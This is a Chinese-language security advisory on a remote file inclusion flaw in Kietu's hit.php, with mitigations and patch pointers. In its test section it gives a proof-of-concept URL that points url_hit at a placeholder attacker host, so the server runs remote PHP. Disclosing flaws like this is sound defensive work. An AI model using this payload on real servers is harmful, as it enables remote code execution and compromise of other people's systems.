安全研究
安全漏洞
Kietu hit.php远程文件包含漏洞
发布日期:2003-02-15
更新日期:2003-02-21
受影响系统:Kietu Kietu 2.3
Kietu Kietu 2.0
描述:
BUGTRAQ ID:
6863
Kietu是一款由PHP编写的程序。
Kietu对用户提交的请求缺少正确检查,远程攻击者可以利用这个漏洞包含远程服务器上的文件,以WEB进程权限执行文件中包含的任意代码。
hit.php文件中包含如下代码:
require ($url_hit."config.php");
由于没有对$url_hit变量没有预先定义,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给$url_hit变量,可导致以WEB进程权限执行PHP文件中包含的恶意代码。
<*来源:Frog Man (
leseulfrog@hotmail.com)
链接:
http://www.frog-man.org/tutos/5holes8.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Frog Man (
leseulfrog@hotmail.com)提供了如下测试方法:
http://[traget]/hit.php?url_hit=http://[attacker]/config.php
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在php.ini文件中设置'allow_url_fopen'和'register_globals'为'off'。
* Frog Man <
leseulfrog@hotmail.com>提供了第三方补丁程序:
http://www.phpsecure.org
厂商补丁:
Kietu
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://kietu.free.fr/浏览次数:2730
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |